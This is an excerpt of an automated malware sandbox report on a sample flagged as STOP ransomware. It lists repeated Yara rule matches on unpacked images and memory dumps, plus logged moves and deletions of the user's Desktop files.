Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bE5aaTiJM0.exe.43515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bE5aaTiJM0.exe.42915a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.bE5aaTiJM0.exe.43515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 4004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 5592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 4376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 3616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 5828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 3920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 3304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bE5aaTiJM0.exe PID: 2888, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File moved: C:\Users\user\Desktop\BNAGMGSPLO.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File deleted: C:\Users\user\Desktop\BNAGMGSPLO.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File moved: C:\Users\user\Desktop\EWZCVGNOWT.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File deleted: C:\Users\user\Desktop\EWZCVGNOWT.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File moved: C:\Users\user\Desktop\TQDFJHPUIU.png	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
